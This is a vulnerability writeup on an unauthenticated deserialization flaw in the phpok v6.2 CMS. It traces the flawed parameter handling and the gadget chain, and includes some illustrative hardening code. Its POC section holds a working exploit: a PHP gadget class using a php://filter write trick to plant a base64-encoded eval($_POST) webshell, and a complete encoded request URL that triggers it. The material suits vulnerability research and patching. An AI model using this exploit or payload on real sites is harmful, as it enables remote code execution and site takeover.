phpok v6.2

Vulnerability description

phpok v6.2 has a front-end (no admin login required) deserialization vulnerability that can be used to write a webshell.

Vulnerability analysis

This CMS routes requests with two parameters: c = controller, f = function.

framework\api\call_control.php#index

The data parameter is JSON; after it is parsed, a type_id key is not allowed.

Further down, execution enters the phpok function in framework\phpok_tpl_helper.php

which calls the phpok function in framework\phpok_call.php

The vulnerability is introduced at the parse_str call here: it hands control of the type_id parameter to the caller.

Next, a template array $call_rs is looked up by $id (here m_picplayer) and combined with array_merge, so the parsed request values overwrite the template and the value of type_id becomes controllable.

Change it to format_ext_all

The function name built from the value of type_id plus an underscore must be one of these 33 functions; the other 32 could also be examined for exploitable behaviour.

The function then called is the one containing the deserialization; from here it is only a matter of constructing the payload.
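As an added illustration (not phpok's own code), the following hypothetical dispatcher shows why merging parse_str() output over a server-side template lets a request override type_id, and the corrected ordering and filtering a defender would apply. The names callTemplate, dispatchWeak, dispatchHardened, the template data, the allow-list, and the exact way the method name is concatenated are all assumptions made for this example; the page does not show phpok's concatenation.

```php
<?php
// Added example, not phpok's code. All names and data below are assumptions.

function callTemplate(string $id): ?array
{
    // Stand-in for the template lookup the writeup calls $call_rs.
    // Constructed sample data: the server-side template fixes type_id.
    $templates = ['m_picplayer' => ['type_id' => 'picplayer', 'num' => 10]];
    return $templates[$id] ?? null;
}

// Weak pattern: the request string is merged last, so its keys win.
function dispatchWeak(string $id, string $param): ?string
{
    $call_rs = callTemplate($id);
    if ($call_rs === null) {
        return null;
    }
    parse_str($param, $fromRequest);            // "0&type_id=x" -> [0 => '', 'type_id' => 'x']
    $rs = array_merge($call_rs, $fromRequest);  // later arrays overwrite earlier keys
    return '_' . $rs['type_id'];                // method name now chosen by the request
}

// Corrected pattern: request keys are allow-listed before the merge, the
// template wins on any collision, and the final method name is checked
// against an explicit list instead of "any of the 33 methods that exist".
function dispatchHardened(string $id, string $param): ?string
{
    $call_rs = callTemplate($id);
    if ($call_rs === null) {
        return null;
    }
    parse_str($param, $fromRequest);
    $allowedKeys = ['num', 'orderby', 'title_len'];          // assumed allow-list
    $fromRequest = array_intersect_key($fromRequest, array_flip($allowedKeys));
    $rs = array_merge($fromRequest, $call_rs);               // template overrides request
    $method = '_' . $rs['type_id'];
    $permittedMethods = ['_picplayer'];                       // assumed safe formatter list
    return in_array($method, $permittedMethods, true) ? $method : null;
}

$attempt = '0&type_id=format_ext_all';
var_dump(dispatchWeak('m_picplayer', $attempt));      // string(15) "_format_ext_all"
var_dump(dispatchHardened('m_picplayer', $attempt));  // string(10) "_picplayer"
```

The point of the hardened version is that type_id is never read from request-derived data at all, so filtering the JSON keys for type_id (which the original code does) is no longer the only line of defence.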

POP

The POP chain is straightforward: a global search for __destruct() shows that framework\engine\cache.php#__destruct() calls save, and both of its parameters are controllable.

Both the file name and the file content are controllable; the only guard is a prepended exit, which a php://filter path with an encoder strips straight away.
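As an added example (not phpok's code), here are two independent controls for the sink described above: decoding untrusted data with unserialize() restricted to plain values, so no object's __destruct() is ever reached, and refusing a cache folder that is a stream-wrapper URL or lies outside the cache root, rather than relying on the prepended exit. The class CacheLike, the function names and the sample serialized string are assumptions constructed for this illustration.

```php
<?php
// Added example, not phpok's code. CacheLike is a stand-in for the gadget
// class; its __destruct() only reports instead of writing a file.

class CacheLike
{
    public $folder = '';
    public $key_id = '';
    public $key_list = [];

    public function __destruct()
    {
        echo "__destruct reached for folder '{$this->folder}'\n";
    }
}

// Weak: any class named in the payload is instantiated, so its
// __destruct() runs when the object is released.
function decodeWeak(string $payload)
{
    return unserialize($payload);
}

// Hardened: objects decode as __PHP_Incomplete_Class, which has no
// __destruct(); an incomplete object is rejected instead of being used.
function decodeHardened(string $payload)
{
    $value = unserialize($payload, ['allowed_classes' => false]);
    if ($value instanceof __PHP_Incomplete_Class) {
        return null;
    }
    return $value;
}

// Second control: validate the cache folder before any write happens.
function isSafeCacheFolder(string $folder, string $cacheRoot): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $folder)) {
        return false;   // php://, data://, ftp:// ... are never a cache directory
    }
    $real = realpath($folder);
    $root = realpath($cacheRoot);
    if ($real === false || $root === false) {
        return false;
    }
    // Require $real to be $root itself or a path underneath it.
    $rootWithSep = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return $real === $root || strncmp($real . DIRECTORY_SEPARATOR, $rootWithSep, strlen($rootWithSep)) === 0;
}

// Constructed sample payload: a CacheLike object with one property set.
$sample = 'O:9:"CacheLike":1:{s:6:"folder";s:3:"tmp";}';

$obj = decodeWeak($sample);
unset($obj);                          // prints: __destruct reached for folder 'tmp'

var_dump(decodeHardened($sample));    // NULL, and nothing is printed by a destructor

$tmp = sys_get_temp_dir();
var_dump(isSafeCacheFolder('php://filter/resource=' . $tmp, $tmp)); // bool(false)
var_dump(isSafeCacheFolder($tmp, $tmp));                              // bool(true)
```

Where cache entries really are written by PHP code, replacing serialize()/unserialize() with json_encode()/json_decode() removes the gadget surface entirely; the allowed_classes option is the smaller change when the storage format cannot be switched.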

POC

```php
<?php
// Gadget class from the writeup: it mirrors framework\engine\cache.php,
// whose __destruct() calls save() with these three properties.
class cache
{
    public $folder = 'php://filter/write=string.strip_tags|convert.base64-decode/resource=D:/phpstudy_pro/WWW/docker/smity2/html/';
    public $key_id = 'shell';
    public $key_list = 'aaaaaIDw/cGhwIGV2YWwoJF9QT1NUW2NtZF0pOz8+';
}
// Encoded twice: once for the request URL, once for the parse_str() step.
$exp = urlencode(urlencode(serialize(new cache())));
echo($exp);
```

Payload

http://127.0.0.1/api.php?c=call&f=index&data={"m_picplayer": "0%26type_id%3Dformat_ext_all%26x%5Bform_type%5D%3Durl%26x%5Bcontent%5D%3DO%253A5%253A%2522cache%2522%253A3%253A%257Bs%253A6%253A%2522folder%2522%253Bs%253A107%253A%2522php%253A%252F%252Ffilter%252Fwrite%253Dstring.strip_tags%257Cconvert.base64-decode%252Fresource%253DD%253A%252Fphpstudy_pro%252FWWW%252Fdocker%252Fsmity2%252Fhtml%252F%2522%253Bs%253A6%253A%2522key_id%2522%253Bs%253A5%253A%2522shell%2522%253Bs%253A8%253A%2522key_list%2522%253Bs%253A41%253A%2522aaaaaIDw%252FcGhwIGV2YWwoJF9QT1NUW2NtZF0pOz8%252B%2522%253B%257D"}
